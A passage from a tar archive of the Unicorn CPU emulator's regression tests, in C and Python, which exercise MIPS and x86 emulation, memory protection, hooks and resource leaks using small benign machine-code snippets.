MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { printf("uc_mem_write(…) failed\n"); return 1; } uc_hook trace; uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + 1); printf("uc_emu_start(…)\n"); uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); printf("done\n"); return 0; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/mips_kernel_mmu.py������������������������������������������������������0000775�0000000�0000000�00000001073�14675241067�0021564�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.mips_const import * import regress class MipsSyscall(regress.RegressTest): def test(self): addr = 0x80000000 code = '34213456'.decode('hex') # ori $at, $at, 0x3456 uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN) uc.mem_map(addr, 0x1000) uc.mem_write(addr, code) uc.reg_write(UC_MIPS_REG_AT, 0) uc.emu_start(addr, addr + len(code)) self.assertEqual(uc.reg_read(UC_MIPS_REG_AT), 0x3456) if __name__ == '__main__': regress.main() ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/mips_kseg0_1.c����������������������������������������������������������0000664�0000000�0000000�00000005271�14675241067�0020452�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include <unicorn/unicorn.h> #include <stdio.h> #include <string.h> #include <stdlib.h> // Test for the MIPS kseg0 and kseg1 memory segments. // See issue https://github.com/unicorn-engine/unicorn/issues/217 // The kseg0 address range 0x80000000-0x9FFFFFFF is not mapped through the MMU, // but instead is directly translated to low ram by masking off the high address bit. // Similarly, the address range kseg1 0xA00000000-0xBFFFFFF is translated directly to // low ram by masking off the top 3 address bits. // Qemu handles these address ranges correctly, but there are issues with the way Unicorn checks for // a valid memory mapping when executing code in the kseg0 or kseg1 memory range. // In particular, Unicorn checks for a valid mapping using the virtual address when executing from kseg0/1, // when it should probably use the real address in low ram. #define KSEG0_VIRT_ADDRESS 0x80001000 //Virtual address in kseg0, mapped by processor (and QEMU) to 0x1000 #define KSEG1_VIRT_ADDRESS 0xA0001000 //Virtual address in kseg1, mapped by processor (and QEMU) to 0x1000 #define KSEG0_1_REAL_ADDRESS 0x1000 //Real address corresponding to the above addresses in kseg0/1 #define MIPS_CODE_EL "\x56\x34\x21\x34" // ori $at, $at, 0x3456; int main(void) { uc_engine *uc; uc_err err; err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32, &uc); if (err) { printf("uc_open %d\n", err); return 1; } // map 4Kb memory for this emulation, into the real address space err = uc_mem_map(uc, KSEG0_1_REAL_ADDRESS, 4 * 1024, UC_PROT_ALL); if (err) { printf("uc_mem_map %d\n", err); return 1; } // write machine code to be emulated to memory err = uc_mem_write(uc, KSEG0_1_REAL_ADDRESS, MIPS_CODE_EL, sizeof(MIPS_CODE_EL) - 1); if (err) { printf("uc_mem_map %s\n", uc_strerror(err)); return 1; } //Start emulation at real address, this currently succeeds err = uc_emu_start(uc, KSEG0_1_REAL_ADDRESS, KSEG0_1_REAL_ADDRESS + 4, 0, 0); if (err) { printf("uc_emu_start at real address: %s\n", uc_strerror(err)); return 1; } //Start emulation at virtual address in kseg0, this cuurently fails err = uc_emu_start(uc, KSEG0_VIRT_ADDRESS, KSEG0_VIRT_ADDRESS + 4, 0, 0); if (err) { printf("uc_emu_start at kseg0 address: %s\n", uc_strerror(err)); return 1; } //Start emulation at virtual address in kseg1, this currently fails err = uc_emu_start(uc, KSEG1_VIRT_ADDRESS, KSEG1_VIRT_ADDRESS + 4, 0, 0); if (err) { printf("uc_emu_start at kseg1 address: %s\n", uc_strerror(err)); return 1; } uc_close(uc); printf("Good, this bug is fixed!\n"); return 0; } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/mips_single_step_sp.py��������������������������������������������������0000775�0000000�0000000�00000002520�14675241067�0022442�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.mips_const import * import regress def code_hook(uc, addr, size, user_data): print 'code hook: pc=%08x sp=%08x' % (addr, uc.reg_read(UC_MIPS_REG_SP)) def run(step=False): addr = 0x4010dc code = ( 'f8ff0124' # addiu $at, $zero, -8 '24e8a103' # and $sp, $sp, $at '09f82003' # jalr $t9 'e8ffbd23' # addi $sp, $sp, -0x18 'b8ffbd27' # addiu $sp, $sp, -0x48 '00000000' # nop ).decode('hex') uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN) if step: uc.hook_add(UC_HOOK_CODE, code_hook) uc.reg_write(UC_MIPS_REG_SP, 0x60800000) uc.reg_write(UC_MIPS_REG_T9, addr + len(code) - 8) print 'sp =', hex(uc.reg_read(UC_MIPS_REG_SP)) print 'at =', hex(uc.reg_read(UC_MIPS_REG_AT)) print '<run> (single step: %s)' % (str(step)) uc.mem_map(addr & ~(0x1000 - 1), 0x2000) uc.mem_write(addr, code) uc.emu_start(addr, addr + len(code)) print 'sp =', hex(uc.reg_read(UC_MIPS_REG_SP)) print 'at =', hex(uc.reg_read(UC_MIPS_REG_AT)) print return uc.reg_read(UC_MIPS_REG_SP) class MipsSingleStep(regress.RegressTest): def test(self): sp1 = run(step=False) sp2 = run(step=True) self.assertEqual(sp1, sp2) if __name__ == '__main__': regress.main() ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/mips_syscall_pc.py������������������������������������������������������0000775�0000000�0000000�00000001353�14675241067�0021563�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.mips_const import * import regress def intr_hook(uc, intno, data): print 'interrupt=%d, v0=%d, pc=0x%08x' % (intno, uc.reg_read(UC_MIPS_REG_V0), uc.reg_read(UC_MIPS_REG_PC)) class MipsSyscall(regress.RegressTest): def test(self): addr = 0x40000 code = '0c000000'.decode('hex') # syscall uc = Uc(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN) uc.mem_map(addr, 0x1000) uc.mem_write(addr, code) uc.reg_write(UC_MIPS_REG_V0, 100) uc.hook_add(UC_HOOK_INTR, intr_hook) uc.emu_start(addr, addr+len(code)) self.assertEqual(0x40004, uc.reg_read(UC_MIPS_REG_PC)) if __name__ == '__main__': regress.main() �������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/mov_gs_eax.py�����������������������������������������������������������0000775�0000000�0000000�00000001146�14675241067�0020526�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.x86_const import * import regress class VldrPcInsn(regress.RegressTest): def runTest(self): uc = Uc(UC_ARCH_X86, UC_MODE_32) uc.mem_map(0x1000, 0x1000) # mov gs, eax; mov eax, 1 code = '8ee8b801000000'.decode('hex') uc.mem_write(0x1000, code) uc.reg_write(UC_X86_REG_EAX, 0xFFFFFFFF) with self.assertRaises(UcError) as ex_ctx: uc.emu_start(0x1000, 0x1000 + len(code)) self.assertEquals(ex_ctx.exception.errno, UC_ERR_EXCEPTION) if __name__ == '__main__': regress.main() ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/movsd.py����������������������������������������������������������������0000775�0000000�0000000�00000001640�14675241067�0017526�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python # By Ryan Hileman, issue #3 from capstone import * from unicorn import * from unicorn.x86_const import * import regress code = 'f20f1005aa120000'.decode('hex') def dis(mem, addr): md = Cs(CS_ARCH_X86, CS_MODE_64) return '\n'.join([ '%s %s' % (i.mnemonic, i.op_str) for i in md.disasm(str(mem), addr) ]) def hook_code(uc, addr, size, user_data): mem = uc.mem_read(addr, size) print 'instruction size:', size print 'instruction:', str(mem).encode('hex'), dis(mem, addr) print 'reference: ', code.encode('hex'), dis(code, addr) class Movsd(regress.RegressTest): def runTest(self): addr = 0x400000 mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.hook_add(UC_HOOK_CODE, hook_code) mu.mem_map(addr, 8 * 1024 * 1024) mu.mem_write(addr, code) mu.emu_start(addr, addr + len(code)) if __name__ == '__main__': regress.main() ������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/nr_mem_test.c�����������������������������������������������������������0000664�0000000�0000000�00000006224�14675241067�0020504�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Non-readable memory test case Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ #include <string.h> #include <unicorn/unicorn.h> const uint8_t PROGRAM[] = "\x8b\x1d\x00\x00\x30\x00\xa1\x00\x00\x40\x00"; // total size: 11 bytes /* bits 32 mov ebx, [0x300000] mov eax, [0x400000] */ // callback for tracing memory access (READ or WRITE) static bool hook_mem_invalid(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { switch(type) { default: // return false to indicate we want to stop emulation return false; case UC_MEM_READ_PROT: printf(">>> non-readable memory is being read at 0x%"PRIx64 ", data size = %u\n", address, size); return false; } } int main(int argc, char **argv, char **envp) { uc_engine *uc; uc_hook trace1; uc_err err; uint32_t eax, ebx; printf("Memory protections test\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return 1; } uc_mem_map(uc, 0x100000, 0x1000, UC_PROT_READ); uc_mem_map(uc, 0x300000, 0x1000, UC_PROT_READ | UC_PROT_WRITE); uc_mem_map(uc, 0x400000, 0x1000, UC_PROT_WRITE); // write machine code to be emulated to memory if (uc_mem_write(uc, 0x100000, PROGRAM, sizeof(PROGRAM))) { printf("Failed to write emulation code to memory, quit!\n"); return 2; } else { printf("Allowed to write to read only memory via uc_mem_write\n"); } uc_mem_write(uc, 0x300000, (const uint8_t*)"\x41\x41\x41\x41", 4); uc_mem_write(uc, 0x400000, (const uint8_t*)"\x42\x42\x42\x42", 4); //uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 0x400000, 0x400fff); // intercept invalid memory events uc_hook_add(uc, &trace1, UC_MEM_READ_PROT, hook_mem_invalid, NULL, 1, 0); // emulate machine code in infinite time printf("BEGIN execution\n"); err = uc_emu_start(uc, 0x100000, 0x100000 + sizeof(PROGRAM), 0, 2); if (err) { printf("Expected failure on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } else { printf("UNEXPECTED uc_emu_start returned UC_ERR_OK\n"); } printf("END execution\n"); uc_reg_read(uc, UC_X86_REG_EAX, &eax); printf("Final eax = 0x%x\n", eax); uc_reg_read(uc, UC_X86_REG_EBX, &ebx); printf("Final ebx = 0x%x\n", ebx); uc_close(uc); return 0; } ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/osx_qemu_thread_create_crash.py�����������������������������������������0000775�0000000�0000000�00000001011�14675241067�0024260�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python import platform import resource from unicorn import * import regress # OS X: OK with 2047 iterations. # OS X: Crashes at 2048:th iteration ("qemu: qemu_thread_create: Resource temporarily unavailable"). # Linux: No crashes observed. class ThreadCreateCrash(regress.RegressTest): def test(self): for i in xrange(2048): Uc(UC_ARCH_X86, UC_MODE_64) self.assertTrue(True, "If not reached, then we have a crashing bug.") if __name__ == '__main__': regress.main() �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/potential_memory_leak.py������������������������������������������������0000775�0000000�0000000�00000001664�14675241067�0022767�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python import platform import resource from unicorn import * import regress class MemoryLeak(regress.RegressTest): def test(self): if platform.system() == "Darwin": rusage_multiplier = 1 elif platform.system() == "Linux": rusage_multiplier = 1024 else: # resource.getrusage(...) is platform dependent. Only tested under OS X and Linux. return max_rss_before = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * rusage_multiplier for i in xrange(10000): mu = Uc(UC_ARCH_X86, UC_MODE_64) mu.mem_map(0, 4096) mu.emu_start(0, 0) max_rss_after = resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * rusage_multiplier rss_increase_per_iteration = (max_rss_after - max_rss_before) / i self.assertLess(rss_increase_per_iteration, 8000) if __name__ == '__main__': regress.main() ����������������������������������������������������������������������������unicorn-2.1.1/tests/regress/pshufb.py���������������������������������������������������������������0000775�0000000�0000000�00000000714�14675241067�0017666�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python # By Ryan Hileman, issue #91 # Invalid instruction = test failed from unicorn import * from unicorn.x86_const import * import regress class Pshufb(regress.RegressTest): def runTest(self): uc = Uc(UC_ARCH_X86, UC_MODE_64) uc.mem_map(0x2000, 0x1000) # pshufb xmm0, xmm1 uc.mem_write(0x2000, '660f3800c1'.decode('hex')) uc.emu_start(0x2000, 0x2005) if __name__ == '__main__': regress.main() ����������������������������������������������������unicorn-2.1.1/tests/regress/reg_write_sign_extension.py���������������������������������������������0000775�0000000�0000000�00000001657�14675241067�0023511�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/env python """See https://github.com/unicorn-engine/unicorn/issues/98""" import unicorn import regress ADDR = 0xffaabbcc def hook_mem_invalid(mu, access, address, size, value, user_data): print ">>> Access type: %u, expected value: 0x%x, actual value: 0x%x" % (access, ADDR, address) assert(address == ADDR) mu.mem_map(address & 0xfffff000, 4 * 1024) mu.mem_write(address, b'\xcc') return True class RegWriteSignExt(regress.RegressTest): def runTest(self): mu = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_32) mu.reg_write(unicorn.x86_const.UC_X86_REG_EBX, ADDR) mu.mem_map(0x10000000, 1024 * 4) # jmp ebx mu.mem_write(0x10000000, b'\xff\xe3') mu.hook_add(unicorn.UC_HOOK_MEM_FETCH_UNMAPPED | unicorn.UC_HOOK_MEM_FETCH_PROT, hook_mem_invalid) mu.emu_start(0x10000000, 0x10000000 + 2, count=1) if __name__ == '__main__': regress.main() ���������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/regress.py��������������������������������������������������������������0000775�0000000�0000000�00000001466�14675241067�0020056�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python import unittest from os.path import dirname, basename, isfile import glob # Find all unittest type in this directory and run it. class RegressTest(unittest.TestCase): pass def main(): unittest.main() if __name__ == '__main__': directory = dirname(__file__) if directory == '': directory = '.' modules = glob.glob(directory+"/*.py") __all__ = [ basename(f)[:-3] for f in modules if isfile(f)] suite = unittest.TestSuite() for module in __all__: m = __import__(module) for cl in dir(m): try: realcl = getattr(m,cl) if issubclass(realcl, unittest.TestCase): suite.addTest(realcl()) except Exception as e: pass unittest.TextTestRunner().run(suite) ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/regress.sh��������������������������������������������������������������0000775�0000000�0000000�00000000412�14675241067�0020026�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/bin/sh ./map_crash ./map_write ./sigill ./sigill2 ./block_test ./ro_mem_test ./nr_mem_test ./timeout_segfault ./rep_movsb ./mem_unmap ./mem_protect ./mem_exec ./mem_map_large ./00opcode_uc_crash ./eflags_noset ./eflags_nosync ./mips_kseg0_1 ./mem_double_unmap ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/rep_hook.py�������������������������������������������������������������0000775�0000000�0000000�00000001220�14675241067�0020176�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#!/usr/bin/python from unicorn import * from unicorn.x86_const import * import regress PAGE_SIZE = 4 * 1024 CODE = b'\xf3\xaa' # rep stosb def hook_code(uc, addr, size, user_data): print("hook called at %x" %addr) class REP(regress.RegressTest): def test_rep(self): mu = Uc(UC_ARCH_X86, UC_MODE_32) mu.mem_map(0, PAGE_SIZE) mu.mem_write(0, CODE) mu.reg_write(UC_X86_REG_ECX, 3) mu.reg_write(UC_X86_REG_EDI, 0x100) mu.hook_add(UC_HOOK_CODE, hook_code) mu.emu_start(0, len(CODE)) self.assertEqual(0, mu.reg_read(UC_X86_REG_ECX)) if __name__ == '__main__': regress.main() ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/regress/rep_movsb.c�������������������������������������������������������������0000664�0000000�0000000�00000012716�14675241067�0020167�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* rep movsb regression Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ #define __STDC_FORMAT_MACROS #include <string.h> #include <stdlib.h> #include <string.h> #include <time.h> #include <unicorn/unicorn.h> unsigned char PROGRAM[] = "\xbe\x00\x00\x20\x00\xbf\x00\x10\x20\x00\xb9\x14\x00\x00\x00\xf3" "\xa4\xf4"; // total size: 18 bytes /* bits 32 ; assumes code section at 0x100000 r-x ; assumes data section at 0x200000-0x202000, rw- mov esi, 0x200000 mov edi, 0x201000 mov ecx, 20 rep movsb hlt */ static int log_num = 1; // callback for tracing instruction static void hook_code(uc_engine *uc, uint64_t addr, uint32_t size, void *user_data) { uint8_t opcode; if (uc_mem_read(uc, addr, &opcode, 1) != UC_ERR_OK) { printf("not ok %d - uc_mem_read fail during hook_code callback, addr: 0x%" PRIx64 "\n", log_num++, addr); _exit(-1); } switch (opcode) { case 0xf4: //hlt printf("# Handling HLT\n"); if (uc_emu_stop(uc) != UC_ERR_OK) { printf("not ok %d - uc_emu_stop fail during hook_code callback, addr: 0x%" PRIx64 "\n", log_num++, addr); _exit(-1); } else { printf("ok %d - hlt encountered, uc_emu_stop called\n", log_num++); } break; default: //all others break; } } // callback for tracing memory access (READ or WRITE) static void hook_mem_write(uc_engine *uc, uc_mem_type type, uint64_t addr, int size, int64_t value, void *user_data) { printf("# write to memory at 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", addr, size, value); if (addr < 0x201000L) { //this is actually a read, we don't write in this range printf("not ok %d - write hook called for read of 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", log_num++, addr, size, value); } else { printf("ok %d - write hook called for write of 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", log_num++, addr, size, value); } } int main(int argc, char **argv, char **envp) { uc_engine *uc; uc_hook trace1, trace2; uc_err err; uint8_t buf1[100], readbuf[100]; printf("# rep movsb test\n"); memset(buf1, 'A', 20); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("not ok %d - Failed on uc_open() with error returned: %u\n", log_num++, err); return 1; } else { printf("ok %d - uc_open() success\n", log_num++); } uc_mem_map(uc, 0x100000, 0x1000, UC_PROT_READ); uc_mem_map(uc, 0x200000, 0x2000, UC_PROT_READ | UC_PROT_WRITE); // fill in the data that we want to copy if (uc_mem_write(uc, 0x200000, buf1, 20)) { printf("not ok %d - Failed to write read buffer to memory, quit!\n", log_num++); return 2; } else { printf("ok %d - Read buffer written to memory\n", log_num++); } // write machine code to be emulated to memory if (uc_mem_write(uc, 0x100000, PROGRAM, sizeof(PROGRAM))) { printf("not ok %d - Failed to write emulation code to memory, quit!\n", log_num++); return 4; } else { printf("ok %d - Program written to memory\n", log_num++); } if (uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 1, 0) != UC_ERR_OK) { printf("not ok %d - Failed to install UC_HOOK_CODE handler\n", log_num++); return 5; } else { printf("ok %d - UC_HOOK_CODE installed\n", log_num++); } // intercept memory write events only, NOT read events if (uc_hook_add(uc, &trace1, UC_HOOK_MEM_WRITE, hook_mem_write, NULL, 1, 0) != UC_ERR_OK) { printf("not ok %d - Failed to install UC_HOOK_MEM_WRITE handler\n", log_num++); return 6; } else { printf("ok %d - UC_HOOK_MEM_WRITE installed\n", log_num++); } // emulate machine code until told to stop by hook_code printf("# BEGIN execution\n"); err = uc_emu_start(uc, 0x100000, 0x101000, 0, 0); if (err != UC_ERR_OK) { printf("not ok %d - Failure on uc_emu_start() with error %u:%s\n", log_num++, err, uc_strerror(err)); return 8; } else { printf("ok %d - uc_emu_start complete\n", log_num++); } printf("# END execution\n"); //make sure that data got copied // fill in sections that shouldn't get touched if (uc_mem_read(uc, 0x201000, readbuf, 20)) { printf("not ok %d - Failed to read random buffer 1 from memory\n", log_num++); } else { printf("ok %d - Random buffer 1 read from memory\n", log_num++); if (memcmp(buf1, readbuf, 20)) { printf("not ok %d - write buffer contents are incorrect\n", log_num++); } else { printf("ok %d - write buffer contents are correct\n", log_num++); } } if (uc_close(uc) == UC_ERR_OK) { printf("ok %d - uc_close complete\n", log_num++); } else { printf("not ok %d - uc_close complete\n", log_num++); } return 0; } ��������������������������������������������������unicorn-2.1.1/tests/regress/ro_mem_test.c�����������������������������������������������������������0000664�0000000�0000000�00000015634�14675241067�0020512�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* Non-writable memory test case Copyright(c) 2015 Chris Eagle This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License version 2 as published by the Free Software Foundation. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. */ #include <string.h> #include <unicorn/unicorn.h> const uint8_t PROGRAM[] = "\xeb\x1a\x58\x83\xc0\x04\x83\xe0\xfc\x83\xc0\x01\xc7\x00\x78\x56" "\x34\x12\x83\xc0\x07\xc7\x00\x21\x43\x65\x87\x90\xe8\xe1\xff\xff" "\xff" "xxxxAAAAxxxBBBB"; // total size: 33 bytes /* jmp short bottom top: pop eax add eax, 4 and eax, 0xfffffffc add eax, 1 ; unaligned mov dword [eax], 0x12345678 ; try to write into code section add eax, 7 ; aligned mov dword [eax], 0x87654321 ; try to write into code section nop bottom: call top */ // callback for tracing instruction /*static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { uint32_t esp; printf(">>> Tracing instruction at 0x%"PRIx64 ", instruction size = 0x%x\n", address, size); uc_reg_read(uc, UC_X86_REG_ESP, &esp); printf(">>> --- ESP is 0x%x\n", esp); } */ // callback for tracing memory access (READ or WRITE) static bool hook_mem_invalid(uc_engine *uc, uc_mem_type type, uint64_t address, int size, int64_t value, void *user_data) { uint32_t esp; uc_reg_read(uc, UC_X86_REG_ESP, &esp); switch(type) { default: // return false to indicate we want to stop emulation return false; case UC_MEM_WRITE: //if this is a push, esp has not been adjusted yet if (esp == (address + size)) { uint32_t upper; upper = (esp + 0xfff) & ~0xfff; printf(">>> Stack appears to be missing at 0x%"PRIx64 ", allocating now\n", address); // map this memory in with 2MB in size uc_mem_map(uc, upper - 0x8000, 0x8000, UC_PROT_READ | UC_PROT_WRITE); // return true to indicate we want to continue return true; } printf(">>> Missing memory is being WRITTEN at 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", address, size, value); return false; case UC_MEM_WRITE_PROT: printf(">>> RO memory is being WRITTEN at 0x%"PRIx64 ", data size = %u, data value = 0x%"PRIx64 "\n", address, size, value); return false; } } #define STACK 0x500000 #define STACK_SIZE 0x5000 int main(int argc, char **argv, char **envp) { uc_engine *uc; uc_hook trace1; uc_err err; uint8_t bytes[8]; uint32_t esp; int map_stack = 0; if (argc == 2 && strcmp(argv[1], "--map-stack") == 0) { map_stack = 1; } printf("Memory mapping test\n"); // Initialize emulator in X86-32bit mode err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); if (err) { printf("Failed on uc_open() with error returned: %u\n", err); return 1; } uc_mem_map(uc, 0x100000, 0x1000, UC_PROT_ALL); uc_mem_map(uc, 0x200000, 0x2000, UC_PROT_ALL); uc_mem_map(uc, 0x300000, 0x3000, UC_PROT_ALL); uc_mem_map(uc, 0x400000, 0x4000, UC_PROT_READ); if (map_stack) { printf("Pre-mapping stack\n"); uc_mem_map(uc, STACK, STACK_SIZE, UC_PROT_READ | UC_PROT_WRITE); } else { printf("Mapping stack on first invalid memory access\n"); } esp = STACK + STACK_SIZE; uc_reg_write(uc, UC_X86_REG_ESP, &esp); // write machine code to be emulated to memory if (uc_mem_write(uc, 0x400000, PROGRAM, sizeof(PROGRAM))) { printf("Failed to write emulation code to memory, quit!\n"); return 2; } else { printf("Allowed to write to read only memory via uc_mem_write\n"); } //uc_hook_add(uc, &trace2, UC_HOOK_CODE, hook_code, NULL, 0x400000, 0x400fff); // intercept invalid memory events uc_hook_add(uc, &trace1, UC_HOOK_MEM_WRITE_UNMAPPED | UC_HOOK_MEM_WRITE_PROT, hook_mem_invalid, NULL, 1, 0); // emulate machine code in infinite time printf("BEGIN execution - 1\n"); err = uc_emu_start(uc, 0x400000, 0x400000 + sizeof(PROGRAM), 0, 10); if (err) { printf("Expected failue on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } else { printf("UNEXPECTED uc_emu_start returned UC_ERR_OK\n"); } printf("END execution - 1\n"); // emulate machine code in infinite time printf("BEGIN execution - 2\n"); //update eax to point to aligned memory (same as add eax,7 above) uint32_t eax = 0x40002C; uc_reg_write(uc, UC_X86_REG_EAX, &eax); //resume execution at the mov dword [eax], 0x87654321 //to test an aligned write as well err = uc_emu_start(uc, 0x400015, 0x400000 + sizeof(PROGRAM), 0, 2); if (err) { printf("Expected failure on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); } else { printf("UNEXPECTED uc_emu_start returned UC_ERR_OK\n"); } printf("END execution - 2\n"); printf("Verifying content at 0x400025 is unchanged\n"); if (!uc_mem_read(uc, 0x400025, bytes, 4)) { printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", (uint32_t)0x400025, *(uint32_t*) bytes); if (0x41414141 != *(uint32_t*) bytes) { printf("ERROR content in read only memory changed\n"); } else { printf("SUCCESS content in read only memory unchanged\n"); } } else { printf(">>> Failed to read 4 bytes from [0x%x]\n", (uint32_t)(esp - 4)); return 4; } printf("Verifying content at 0x40002C is unchanged\n"); if (!uc_mem_read(uc, 0x40002C, bytes, 4)) { printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", (uint32_t)0x40002C, *(uint32_t*) bytes); if (0x42424242 != *(uint32_t*) bytes) { printf("ERROR content in read only memory changed\n"); } else { printf("SUCCESS content in read only memory unchanged\n"); } } else { printf(">>> Failed to read 4 bytes from [0x%x]\n", (uint32_t)(esp - 4)); return 4; } printf("Verifying content at bottom of stack is readable and correct\n"); if (!uc_mem_read(uc, esp - 4, bytes, 4)) { printf(">>> Read 4 bytes from [0x%x] = 0x%x\n", (uint32_t)(esp - 4), *(uint32_t*) bytes); } else { printf(">>> Failed to read 4 bytes from [0x%x]\n", (uint32_t)(esp - 4)); return 4; 